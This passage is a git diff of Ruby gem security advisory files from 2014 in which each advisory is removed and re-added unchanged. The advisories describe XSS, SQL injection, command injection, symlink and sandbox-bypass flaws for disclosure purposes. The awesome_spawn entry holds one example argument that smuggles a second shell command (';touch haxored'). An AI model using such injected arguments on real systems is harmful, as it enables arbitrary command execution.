+  - ">= 4.0.37"
+---
diff --git a/advisories/_posts/2014-01-29-CVE-2014-1832.md b/advisories/_posts/2014-01-29-CVE-2014-1832.md
index e0ed3b01..269790d7 100644
--- a/advisories/_posts/2014-01-29-CVE-2014-1832.md
+++ b/advisories/_posts/2014-01-29-CVE-2014-1832.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-1832 (passenger): CVE-2014-1831 CVE-2014-1832 rubygem-passenger:
-  insecure use of temporary files'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2014-1832
-  osvdb: 102613
-  ghsa: qw8w-2xcp-xg59
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1832
-  title: 'CVE-2014-1831 CVE-2014-1832 rubygem-passenger: insecure use of temporary
-    files'
-  date: 2014-01-29
-  description: |
-    'Phusion Passenger 4.0.37 allows local users to write to certain files
-    and directories via a symlink attack on (1) control_process.pid or a (2) generation-*
-    file.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-1831.'
-  cvss_v2: 2.1
-  patched_versions:
-  - ">= 4.0.38"
----
+---
+layout: advisory
+title: 'CVE-2014-1832 (passenger): CVE-2014-1831 CVE-2014-1832 rubygem-passenger:
+  insecure use of temporary files'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2014-1832
+  osvdb: 102613
+  ghsa: qw8w-2xcp-xg59
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1832
+  title: 'CVE-2014-1831 CVE-2014-1832 rubygem-passenger: insecure use of temporary
+    files'
+  date: 2014-01-29
+  description: |
+    'Phusion Passenger 4.0.37 allows local users to write to certain files
+    and directories via a symlink attack on (1) control_process.pid or a (2) generation-*
+    file.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-1831.'
+  cvss_v2: 2.1
+  patched_versions:
+  - ">= 4.0.38"
+---
diff --git a/advisories/_posts/2014-01-31-OSVDB-103151.md b/advisories/_posts/2014-01-31-OSVDB-103151.md
index 75723c53..34b968f6 100644
--- a/advisories/_posts/2014-01-31-OSVDB-103151.md
+++ b/advisories/_posts/2014-01-31-OSVDB-103151.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-103151 (paperclip): Paperclip: Access Restriction Bypass'
-comments: false
-categories:
-- paperclip
-advisory:
-  gem: paperclip
-  osvdb: 103151
-  url: https://security.snyk.io/vuln/SNYK-RUBY-PAPERCLIP-20144
-  title: 'Paperclip: Access Restriction Bypass'
-  date: 2014-01-31
-  description: |
-    Paperclip Gem for Ruby contains a flaw that is due to the application
-    failing to properly validate the file extension, instead only validating the Content-Type
-    header during file uploads. This may allow a remote attacker to bypass restrictions
-    on file types for uploaded files by spoofing the content-type.
-  patched_versions:
-  - ">= 4.0.0"
-  related:
-    url:
-    - https://thoughtbot.com/blog/prevent-spoofing-with-paperclip
-    - https://www.theregister.com/2014/02/09/content_type_spoofing_bug_in_ror_paperclip
-    - https://security.snyk.io/vuln/SNYK-RUBY-PAPERCLIP-20144
-    - http://osvdb.org/show/osvdb/103151
----
+---
+layout: advisory
+title: 'OSVDB-103151 (paperclip): Paperclip: Access Restriction Bypass'
+comments: false
+categories:
+- paperclip
+advisory:
+  gem: paperclip
+  osvdb: 103151
+  url: https://security.snyk.io/vuln/SNYK-RUBY-PAPERCLIP-20144
+  title: 'Paperclip: Access Restriction Bypass'
+  date: 2014-01-31
+  description: |
+    Paperclip Gem for Ruby contains a flaw that is due to the application
+    failing to properly validate the file extension, instead only validating the Content-Type
+    header during file uploads. This may allow a remote attacker to bypass restrictions
+    on file types for uploaded files by spoofing the content-type.
+  patched_versions:
+  - ">= 4.0.0"
+  related:
+    url:
+    - https://thoughtbot.com/blog/prevent-spoofing-with-paperclip
+    - https://www.theregister.com/2014/02/09/content_type_spoofing_bug_in_ror_paperclip
+    - https://security.snyk.io/vuln/SNYK-RUBY-PAPERCLIP-20144
+    - http://osvdb.org/show/osvdb/103151
+---
diff --git a/advisories/_posts/2014-02-07-CVE-2014-0046.md b/advisories/_posts/2014-02-07-CVE-2014-0046.md
index d4446109..7e393ba7 100644
--- a/advisories/_posts/2014-02-07-CVE-2014-0046.md
+++ b/advisories/_posts/2014-02-07-CVE-2014-0046.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2014-0046 (ember-source): Ember.js XSS Vulnerability With {{link-to}}
-  Helper in Non-block Form'
-comments: false
-categories:
-- ember-source
-advisory:
-  gem: ember-source
-  cve: 2014-0046
-  ghsa: 4q53-fqhc-cr46
-  url: https://groups.google.com/forum/#!topic/ember-security/1h6FRgr8lXQ
-  title: Ember.js XSS Vulnerability With {{link-to}} Helper in Non-block Form
-  date: 2014-02-07
-  description: |
-    In general, Ember.js escapes or strips any user-supplied content before
-    inserting it in strings that will be sent to innerHTML.  However, a change made
-    to the implementation of the {{link-to}} helper means that any user-supplied
-    data bound to the {{link-to}} helper's title attribute will not be escaped
-    correctly.
-
-    In applications that use the {{link-to}} helper in non-block form and bind
-    the title attribute to user-supplied content, a specially-crafted payload
-    could execute arbitrary JavaScript in the context of the current domain
-    ("XSS").
-
-    All users running an affected release and binding user-supplied data to the
-    {{link-to}} helper's title attribute should either upgrade or use one of the
-    workarounds immediately.
-  unaffected_versions:
-  - "< 1.2.0"
-  patched_versions:
-  - "~> 1.2.2"
-  - ">= 1.3.2"
----
+---
+layout: advisory
+title: 'CVE-2014-0046 (ember-source): Ember.js XSS Vulnerability With {{link-to}}
+  Helper in Non-block Form'
+comments: false
+categories:
+- ember-source
+advisory:
+  gem: ember-source
+  cve: 2014-0046
+  ghsa: 4q53-fqhc-cr46
+  url: https://groups.google.com/forum/#!topic/ember-security/1h6FRgr8lXQ
+  title: Ember.js XSS Vulnerability With {{link-to}} Helper in Non-block Form
+  date: 2014-02-07
+  description: |
+    In general, Ember.js escapes or strips any user-supplied content before
+    inserting it in strings that will be sent to innerHTML.  However, a change made
+    to the implementation of the {{link-to}} helper means that any user-supplied
+    data bound to the {{link-to}} helper's title attribute will not be escaped
+    correctly.
+
+    In applications that use the {{link-to}} helper in non-block form and bind
+    the title attribute to user-supplied content, a specially-crafted payload
+    could execute arbitrary JavaScript in the context of the current domain
+    ("XSS").
+
+    All users running an affected release and binding user-supplied data to the
+    {{link-to}} helper's title attribute should either upgrade or use one of the
+    workarounds immediately.
+  unaffected_versions:
+  - "< 1.2.0"
+  patched_versions:
+  - "~> 1.2.2"
+  - ">= 1.3.2"
+---
diff --git a/advisories/_posts/2014-02-13-CVE-2014-0083.md b/advisories/_posts/2014-02-13-CVE-2014-0083.md
index efecb5e9..3867c493 100644
--- a/advisories/_posts/2014-02-13-CVE-2014-0083.md
+++ b/advisories/_posts/2014-02-13-CVE-2014-0083.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-0083 (net-ldap): CVE-2014-0083 rubygem-net-ldap: SSHA passwords generated
-  by the net-ldap Ruby gem use a weak salt'
-comments: false
-categories:
-- net-ldap
-advisory:
-  gem: net-ldap
-  cve: 2014-0083
-  osvdb: 106108
-  ghsa: qwgm-mxm4-3q2c
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0083
-  title: 'CVE-2014-0083 rubygem-net-ldap: SSHA passwords generated by the net-ldap
-    Ruby gem use a weak salt'
-  date: 2014-02-13
-  description: |
-    The Ruby net-ldap gem before 0.11 uses a weak salt when generating SSHA
-    passwords.
-  cvss_v2: 1.9
-  cvss_v3: 5.5
-  patched_versions:
-  - ">= 0.6.0"
----
+---
+layout: advisory
+title: 'CVE-2014-0083 (net-ldap): CVE-2014-0083 rubygem-net-ldap: SSHA passwords generated
+  by the net-ldap Ruby gem use a weak salt'
+comments: false
+categories:
+- net-ldap
+advisory:
+  gem: net-ldap
+  cve: 2014-0083
+  osvdb: 106108
+  ghsa: qwgm-mxm4-3q2c
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0083
+  title: 'CVE-2014-0083 rubygem-net-ldap: SSHA passwords generated by the net-ldap
+    Ruby gem use a weak salt'
+  date: 2014-02-13
+  description: |
+    The Ruby net-ldap gem before 0.11 uses a weak salt when generating SSHA
+    passwords.
+  cvss_v2: 1.9
+  cvss_v3: 5.5
+  patched_versions:
+  - ">= 0.6.0"
+---
diff --git a/advisories/_posts/2014-02-18-CVE-2014-0080.md b/advisories/_posts/2014-02-18-CVE-2014-0080.md
index e4cca673..fc3a6efd 100644
--- a/advisories/_posts/2014-02-18-CVE-2014-0080.md
+++ b/advisories/_posts/2014-02-18-CVE-2014-0080.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2014-0080 (activerecord): CVE-2014-0080 rubygem-activerecord: PostgreSQL
-  array data injection vulnerability'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2014-0080
-  osvdb: 103438
-  ghsa: hqf9-rc9j-5fmj
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0080
-  title: 'CVE-2014-0080 rubygem-activerecord: PostgreSQL array data injection vulnerability'
-  date: 2014-02-18
-  description: |
-    SQL injection vulnerability in activerecord/lib/active_record/connection_adapters/postgresql/cast.rb
-    in Active Record in Ruby on Rails 4.0.x before 4.0.3, and 4.1.0.beta1, when PostgreSQL
-    is used, allows remote attackers to execute "add data" SQL commands via vectors
-    involving \ (backslash) characters that are not properly handled in operations on
-    array columns.
-  unaffected_versions:
-  - "< 3.2.0"
-  - "~> 3.2.0"
-  patched_versions:
-  - "~> 4.0.3"
-  - ">= 4.1.0.beta2"
----
+---
+layout: advisory
+title: 'CVE-2014-0080 (activerecord): CVE-2014-0080 rubygem-activerecord: PostgreSQL
+  array data injection vulnerability'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2014-0080
+  osvdb: 103438
+  ghsa: hqf9-rc9j-5fmj
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0080
+  title: 'CVE-2014-0080 rubygem-activerecord: PostgreSQL array data injection vulnerability'
+  date: 2014-02-18
+  description: |
+    SQL injection vulnerability in activerecord/lib/active_record/connection_adapters/postgresql/cast.rb
+    in Active Record in Ruby on Rails 4.0.x before 4.0.3, and 4.1.0.beta1, when PostgreSQL
+    is used, allows remote attackers to execute "add data" SQL commands via vectors
+    involving \ (backslash) characters that are not properly handled in operations on
+    array columns.
+  unaffected_versions:
+  - "< 3.2.0"
+  - "~> 3.2.0"
+  patched_versions:
+  - "~> 4.0.3"
+  - ">= 4.1.0.beta2"
+---
diff --git a/advisories/_posts/2014-02-18-CVE-2014-0081.md b/advisories/_posts/2014-02-18-CVE-2014-0081.md
index 8f111831..a3a4c645 100644
--- a/advisories/_posts/2014-02-18-CVE-2014-0081.md
+++ b/advisories/_posts/2014-02-18-CVE-2014-0081.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2014-0081 (actionpack): CVE-2014-0081 rubygem-actionpack: number_to_currency,
-  number_to_percentage and number_to_human XSS vulnerability'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2014-0081
-  osvdb: 103439
-  ghsa: m46p-ggm5-5j83
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0081
-  title: 'CVE-2014-0081 rubygem-actionpack: number_to_currency, number_to_percentage
-    and number_to_human XSS vulnerability'
-  date: 2014-02-18
-  description: |
-    Multiple cross-site scripting (XSS) vulnerabilities in actionview/lib/action_view/helpers/number_helper.rb
-    in Ruby on Rails before 3.2.17, 4.0.x before 4.0.3, and 4.1.x before 4.1.0.beta2
-    allow remote attackers to inject arbitrary web script or HTML via the (1) format,
-    (2) negative_format, or (3) units parameter to the (a) number_to_currency, (b) number_to_percentage,
-    or (c) number_to_human helper.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.2.17"
-  - "~> 4.0.3"
-  - ">= 4.1.0.beta2"
----
+---
+layout: advisory
+title: 'CVE-2014-0081 (actionpack): CVE-2014-0081 rubygem-actionpack: number_to_currency,
+  number_to_percentage and number_to_human XSS vulnerability'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2014-0081
+  osvdb: 103439
+  ghsa: m46p-ggm5-5j83
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0081
+  title: 'CVE-2014-0081 rubygem-actionpack: number_to_currency, number_to_percentage
+    and number_to_human XSS vulnerability'
+  date: 2014-02-18
+  description: |
+    Multiple cross-site scripting (XSS) vulnerabilities in actionview/lib/action_view/helpers/number_helper.rb
+    in Ruby on Rails before 3.2.17, 4.0.x before 4.0.3, and 4.1.x before 4.1.0.beta2
+    allow remote attackers to inject arbitrary web script or HTML via the (1) format,
+    (2) negative_format, or (3) units parameter to the (a) number_to_currency, (b) number_to_percentage,
+    or (c) number_to_human helper.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.2.17"
+  - "~> 4.0.3"
+  - ">= 4.1.0.beta2"
+---
diff --git a/advisories/_posts/2014-02-18-CVE-2014-0082.md b/advisories/_posts/2014-02-18-CVE-2014-0082.md
index 9ea3e494..7b5aa8f9 100644
--- a/advisories/_posts/2014-02-18-CVE-2014-0082.md
+++ b/advisories/_posts/2014-02-18-CVE-2014-0082.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2014-0082 (actionpack): CVE-2014-0082 rubygem-actionpack: Action View
-  string handling denial of service'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2014-0082
-  osvdb: 103440
-  ghsa: 7cgp-c3g7-qvrw
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0082
-  title: 'CVE-2014-0082 rubygem-actionpack: Action View string handling denial of
-    service'
-  date: 2014-02-18
-  description: |
-    actionpack/lib/action_view/template/text.rb in Action View in Ruby on
-    Rails 3.x before 3.2.17 converts MIME type strings to symbols during use of the
-    :text option to the render method, which allows remote attackers to cause a denial
-    of service (memory consumption) by including these strings in headers.
-  cvss_v2: 5.0
-  unaffected_versions:
-  - ">= 4.0.0"
-  patched_versions:
-  - ">= 3.2.17"
----
+---
+layout: advisory
+title: 'CVE-2014-0082 (actionpack): CVE-2014-0082 rubygem-actionpack: Action View
+  string handling denial of service'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2014-0082
+  osvdb: 103440
+  ghsa: 7cgp-c3g7-qvrw
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0082
+  title: 'CVE-2014-0082 rubygem-actionpack: Action View string handling denial of
+    service'
+  date: 2014-02-18
+  description: |
+    actionpack/lib/action_view/template/text.rb in Action View in Ruby on
+    Rails 3.x before 3.2.17 converts MIME type strings to symbols during use of the
+    :text option to the render method, which allows remote attackers to cause a denial
+    of service (memory consumption) by including these strings in headers.
+  cvss_v2: 5.0
+  unaffected_versions:
+  - ">= 4.0.0"
+  patched_versions:
+  - ">= 3.2.17"
+---
diff --git a/advisories/_posts/2014-03-05-CVE-2014-0036.md b/advisories/_posts/2014-03-05-CVE-2014-0036.md
index d836d7bb..89df6ad2 100644
--- a/advisories/_posts/2014-03-05-CVE-2014-0036.md
+++ b/advisories/_posts/2014-03-05-CVE-2014-0036.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2014-0036 (rbovirt): CVE-2014-0036 rubygem-rbovirt: unsafe use of rest-client'
-comments: false
-categories:
-- rbovirt
-advisory:
-  gem: rbovirt
-  cve: 2014-0036
-  osvdb: 104080
-  ghsa: ww79-8xwv-932x
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0036
-  title: 'CVE-2014-0036 rubygem-rbovirt: unsafe use of rest-client'
-  date: 2014-03-05
-  description: |
-    The rbovirt gem before 0.0.24 for Ruby uses the rest-client gem with
-    SSL verification disabled, which allows remote attackers to conduct man-in-the-middle
-    attacks via unspecified vectors.
-  cvss_v2: 6.8
-  patched_versions:
-  - ">= 0.0.24"
----
+---
+layout: advisory
+title: 'CVE-2014-0036 (rbovirt): CVE-2014-0036 rubygem-rbovirt: unsafe use of rest-client'
+comments: false
+categories:
+- rbovirt
+advisory:
+  gem: rbovirt
+  cve: 2014-0036
+  osvdb: 104080
+  ghsa: ww79-8xwv-932x
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0036
+  title: 'CVE-2014-0036 rubygem-rbovirt: unsafe use of rest-client'
+  date: 2014-03-05
+  description: |
+    The rbovirt gem before 0.0.24 for Ruby uses the rest-client gem with
+    SSL verification disabled, which allows remote attackers to conduct man-in-the-middle
+    attacks via unspecified vectors.
+  cvss_v2: 6.8
+  patched_versions:
+  - ">= 0.0.24"
+---
diff --git a/advisories/_posts/2014-03-10-CVE-2014-2322.md b/advisories/_posts/2014-03-10-CVE-2014-2322.md
index 28145d6f..63efafe3 100644
--- a/advisories/_posts/2014-03-10-CVE-2014-2322.md
+++ b/advisories/_posts/2014-03-10-CVE-2014-2322.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2014-2322 (Arabic-Prawn): Arabic Prawn Gem for Ruby lib/string_utf_support.rb
-  User Input Handling Remote Command Injection'
-comments: false
-categories:
-- Arabic-Prawn
-advisory:
-  gem: Arabic-Prawn
-  cve: 2014-2322
-  osvdb: 104365
-  ghsa: hgmw-x865-hf9x
-  url: http://www.openwall.com/lists/oss-security/2014/03/10/8
-  title: Arabic Prawn Gem for Ruby lib/string_utf_support.rb User Input Handling Remote
-    Command Injection
-  date: 2014-03-10
-  description: |
-    Arabic Prawn Gem for Ruby contains a flaw in the lib/string_utf_support.rb
-    file. The issue is due to the program failing to sanitize user input. This may
-    allow a remote attacker to inject arbitrary commands.
-
-    "lib/string_utf_support.rb" in the Arabic Prawn 0.0.1 gem for Ruby
-    allows remote attackers to execute arbitrary commands via shell
-    metacharacters  in the (1) downloaded_file or (2) url variable.
-  cvss_v2: 7.5
-  notes: Never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-2322
-    - http://www.openwall.com/lists/oss-security/2014/03/10/8
-    - http://www.openwall.com/lists/oss-security/2014/03/12/6
-    - https://web.archive.org/web/20160306235714/http://www.vapid.dhs.org/advisories/arabic-ruby-gem.html
-    - http://www.vapid.dhs.org/advisories/arabic-ruby-gem.html
-    - http://www.vapidlabs.com/advisory.php?v=16
-    - https://github.com/advisories/GHSA-hgmw-x865-hf9x
-    - https://rubygems.org/gems/Arabic-Prawn
----
+---
+layout: advisory
+title: 'CVE-2014-2322 (Arabic-Prawn): Arabic Prawn Gem for Ruby lib/string_utf_support.rb
+  User Input Handling Remote Command Injection'
+comments: false
+categories:
+- Arabic-Prawn
+advisory:
+  gem: Arabic-Prawn
+  cve: 2014-2322
+  osvdb: 104365
+  ghsa: hgmw-x865-hf9x
+  url: http://www.openwall.com/lists/oss-security/2014/03/10/8
+  title: Arabic Prawn Gem for Ruby lib/string_utf_support.rb User Input Handling Remote
+    Command Injection
+  date: 2014-03-10
+  description: |
+    Arabic Prawn Gem for Ruby contains a flaw in the lib/string_utf_support.rb
+    file. The issue is due to the program failing to sanitize user input. This may
+    allow a remote attacker to inject arbitrary commands.
+
+    "lib/string_utf_support.rb" in the Arabic Prawn 0.0.1 gem for Ruby
+    allows remote attackers to execute arbitrary commands via shell
+    metacharacters  in the (1) downloaded_file or (2) url variable.
+  cvss_v2: 7.5
+  notes: Never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-2322
+    - http://www.openwall.com/lists/oss-security/2014/03/10/8
+    - http://www.openwall.com/lists/oss-security/2014/03/12/6
+    - https://web.archive.org/web/20160306235714/http://www.vapid.dhs.org/advisories/arabic-ruby-gem.html
+    - http://www.vapid.dhs.org/advisories/arabic-ruby-gem.html
+    - http://www.vapidlabs.com/advisory.php?v=16
+    - https://github.com/advisories/GHSA-hgmw-x865-hf9x
+    - https://rubygems.org/gems/Arabic-Prawn
+---
diff --git a/advisories/_posts/2014-03-13-CVE-2014-0135.md b/advisories/_posts/2014-03-13-CVE-2014-0135.md
index 35c2facf..ad846491 100644
--- a/advisories/_posts/2014-03-13-CVE-2014-0135.md
+++ b/advisories/_posts/2014-03-13-CVE-2014-0135.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2014-0135 (kafo): CVE-2014-0135 rubygem-kafo: temporary file creation
-  vulnerability when creating /tmp/default_values.yaml'
-comments: false
-categories:
-- kafo
-advisory:
-  gem: kafo
-  cve: 2014-0135
-  osvdb: 106826
-  ghsa: hxvp-655x-xxqv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0135
-  title: 'CVE-2014-0135 rubygem-kafo: temporary file creation vulnerability when creating
-    /tmp/default_values.yaml'
-  date: 2014-03-13
-  description: |
-    Kafo before 0.3.17 and 0.4.x before 0.5.2, as used by Foreman, uses world-readable
-    permissions for default_values.yaml, which allows local users to obtain passwords
-    and other sensitive information by reading the file.
-  cvss_v2: 1.9
-  patched_versions:
-  - "~> 0.3.17"
-  - ">= 0.5.2"
-  related:
-    url:
-    - https://github.com/rubysec/ruby-advisory-db/issues/238
-    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/world-readable-permissions-as-default/ruby/sid-740/summary
----
+---
+layout: advisory
+title: 'CVE-2014-0135 (kafo): CVE-2014-0135 rubygem-kafo: temporary file creation
+  vulnerability when creating /tmp/default_values.yaml'
+comments: false
+categories:
+- kafo
+advisory:
+  gem: kafo
+  cve: 2014-0135
+  osvdb: 106826
+  ghsa: hxvp-655x-xxqv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-0135
+  title: 'CVE-2014-0135 rubygem-kafo: temporary file creation vulnerability when creating
+    /tmp/default_values.yaml'
+  date: 2014-03-13
+  description: |
+    Kafo before 0.3.17 and 0.4.x before 0.5.2, as used by Foreman, uses world-readable
+    permissions for default_values.yaml, which allows local users to obtain passwords
+    and other sensitive information by reading the file.
+  cvss_v2: 1.9
+  patched_versions:
+  - "~> 0.3.17"
+  - ">= 0.5.2"
+  related:
+    url:
+    - https://github.com/rubysec/ruby-advisory-db/issues/238
+    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/world-readable-permissions-as-default/ruby/sid-740/summary
+---
diff --git a/advisories/_posts/2014-03-25-CVE-2014-4920.md b/advisories/_posts/2014-03-25-CVE-2014-4920.md
index ea2b278b..9f125da8 100644
--- a/advisories/_posts/2014-03-25-CVE-2014-4920.md
+++ b/advisories/_posts/2014-03-25-CVE-2014-4920.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2014-4920 (twitter-bootstrap-rails): Reflective XSS Vulnerability in twitter-bootstrap-rails'
-comments: false
-categories:
-- twitter-bootstrap-rails
-- rails
-advisory:
-  gem: twitter-bootstrap-rails
-  framework: rails
-  cve: 2014-4920
-  osvdb: 109206
-  ghsa: vpqv-mqvc-pcx2
-  url: https://nvisium.com/blog/2014/03/28/reflected-xss-vulnerability-in-twitter
-  title: Reflective XSS Vulnerability in twitter-bootstrap-rails
-  date: 2014-03-25
-  description: |
-    The twitter-bootstrap-rails Gem for Rails contains a flaw that enables a
-    reflected cross-site scripting (XSS) attack. This flaw exists because the
-    bootstrap_flash helper method does not validate input when handling flash
-    messages before returning it to users. This may allow a context-dependent
-    attacker to create a specially crafted request that would execute arbitrary
-    script code in a user's browser session within the trust relationship between
-    their browser and the server.
-  patched_versions:
-  - ">= 3.2.0"
----
+---
+layout: advisory
+title: 'CVE-2014-4920 (twitter-bootstrap-rails): Reflective XSS Vulnerability in twitter-bootstrap-rails'
+comments: false
+categories:
+- twitter-bootstrap-rails
+- rails
+advisory:
+  gem: twitter-bootstrap-rails
+  framework: rails
+  cve: 2014-4920
+  osvdb: 109206
+  ghsa: vpqv-mqvc-pcx2
+  url: https://nvisium.com/blog/2014/03/28/reflected-xss-vulnerability-in-twitter
+  title: Reflective XSS Vulnerability in twitter-bootstrap-rails
+  date: 2014-03-25
+  description: |
+    The twitter-bootstrap-rails Gem for Rails contains a flaw that enables a
+    reflected cross-site scripting (XSS) attack. This flaw exists because the
+    bootstrap_flash helper method does not validate input when handling flash
+    messages before returning it to users. This may allow a context-dependent
+    attacker to create a specially crafted request that would execute arbitrary
+    script code in a user's browser session within the trust relationship between
+    their browser and the server.
+  patched_versions:
+  - ">= 3.2.0"
+---
diff --git a/advisories/_posts/2014-03-28-CVE-2014-0156.md b/advisories/_posts/2014-03-28-CVE-2014-0156.md
index 06518df3..a4151e79 100644
--- a/advisories/_posts/2014-03-28-CVE-2014-0156.md
+++ b/advisories/_posts/2014-03-28-CVE-2014-0156.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-0156 (awesome_spawn): OS command injection flaw in awesome_spawn'
-comments: false
-categories:
-- awesome_spawn
-advisory:
-  gem: awesome_spawn
-  cve: 2014-0156
-  ghsa: qpqw-mc85-qvm9
-  url: https://github.com/ManageIQ/awesome_spawn/commit/e524f85f1c6e292ef7d117d7818521307ac269ff
-  title: OS command injection flaw in awesome_spawn
-  date: 2014-03-28
-  description: |
-    Awesome spawn contains OS command injection vulnerability, which allows
-    execution of additional commands passed to Awesome spawn as arguments, e.g. AwesomeSpawn.run('ls',:params
-    => {'-l' => ";touch haxored"}). If untrusted input was included in command arguments,
-    attacker could use this flaw to execute arbitrary command.
-  cvss_v2: 6.8
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 1.2.0"
-  - ">= 1.3.0"
----
+---
+layout: advisory
+title: 'CVE-2014-0156 (awesome_spawn): OS command injection flaw in awesome_spawn'
+comments: false
+categories:
+- awesome_spawn
+advisory:
+  gem: awesome_spawn
+  cve: 2014-0156
+  ghsa: qpqw-mc85-qvm9
+  url: https://github.com/ManageIQ/awesome_spawn/commit/e524f85f1c6e292ef7d117d7818521307ac269ff
+  title: OS command injection flaw in awesome_spawn
+  date: 2014-03-28
+  description: |
+    Awesome spawn contains OS command injection vulnerability, which allows
+    execution of additional commands passed to Awesome spawn as arguments, e.g. AwesomeSpawn.run('ls',:params
+    => {'-l' => ";touch haxored"}). If untrusted input was included in command arguments,
+    attacker could use this flaw to execute arbitrary command.
+  cvss_v2: 6.8
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 1.2.0"
+  - ">= 1.3.0"
+---
diff --git a/advisories/_posts/2014-04-16-CVE-2014-2888.md b/advisories/_posts/2014-04-16-CVE-2014-2888.md
index d77100c2..e282f66c 100644
--- a/advisories/_posts/2014-04-16-CVE-2014-2888.md
+++ b/advisories/_posts/2014-04-16-CVE-2014-2888.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-2888 (sfpagent): sfpagent Gem for Ruby JSON[body] Module Name Remote
-  Command Execution'
-comments: false
-categories:
-- sfpagent
-advisory:
-  gem: sfpagent
-  cve: 2014-2888
-  osvdb: 105971
-  ghsa: vm28-mrm7-fpjq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-2888
-  title: sfpagent Gem for Ruby JSON[body] Module Name Remote Command Execution
-  date: 2014-04-16
-  description: |
-    sfpagent Gem for Ruby contains a flaw that is triggered as JSON[body]
-    input is not properly sanitized when handling module names with shell
-    metacharacters. This may allow a context-dependent attacker to execute
-    arbitrary commands.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 0.4.15"
----
+---
+layout: advisory
+title: 'CVE-2014-2888 (sfpagent): sfpagent Gem for Ruby JSON[body] Module Name Remote
+  Command Execution'
+comments: false
+categories:
+- sfpagent
+advisory:
+  gem: sfpagent
+  cve: 2014-2888
+  osvdb: 105971
+  ghsa: vm28-mrm7-fpjq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-2888
+  title: sfpagent Gem for Ruby JSON[body] Module Name Remote Command Execution
+  date: 2014-04-16
+  description: |
+    sfpagent Gem for Ruby contains a flaw that is triggered as JSON[body]
+    input is not properly sanitized when handling module names with shell
+    metacharacters. This may allow a context-dependent attacker to execute
+    arbitrary commands.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 0.4.15"
+---
diff --git a/advisories/_posts/2014-04-24-OSVDB-106279.md b/advisories/_posts/2014-04-24-OSVDB-106279.md
index a399de58..0b668f96 100644
--- a/advisories/_posts/2014-04-24-OSVDB-106279.md
+++ b/advisories/_posts/2014-04-24-OSVDB-106279.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-106279 (jruby-sandbox): jruby-sandbox Java Class Importation Sandbox
-  Bypass'
-comments: false
-categories:
-- jruby-sandbox
-- jruby
-advisory:
-  gem: jruby-sandbox
-  platform: jruby
-  osvdb: 106279
-  url: https://security.snyk.io/vuln/SNYK-RUBY-JRUBYSANDBOX-20156
-  title: jruby-sandbox Java Class Importation Sandbox Bypass
-  date: 2014-04-24
-  description: |
-    jruby-sandbox contains a flaw that is triggered when importing Java Classes.
-    This may allow a remote attacker to bypass the sandbox for code execution.
-  patched_versions:
-  - ">= 0.2.3"
-  related:
-    url:
-    - https://www.exploit-db.com/exploits/33028
-    - https://security.snyk.io/vuln/SNYK-RUBY-JRUBYSANDBOX-20156
----
+---
+layout: advisory
+title: 'OSVDB-106279 (jruby-sandbox): jruby-sandbox Java Class Importation Sandbox
+  Bypass'
+comments: false
+categories:
+- jruby-sandbox
+- jruby
+advisory:
+  gem: jruby-sandbox
+  platform: jruby
+  osvdb: 106279
+  url: https://security.snyk.io/vuln/SNYK-RUBY-JRUBYSANDBOX-20156
+  title: jruby-sandbox Java Class Importation Sandbox Bypass
+  date: 2014-04-24
+  description: |
+    jruby-sandbox contains a flaw that is triggered when importing Java Classes.
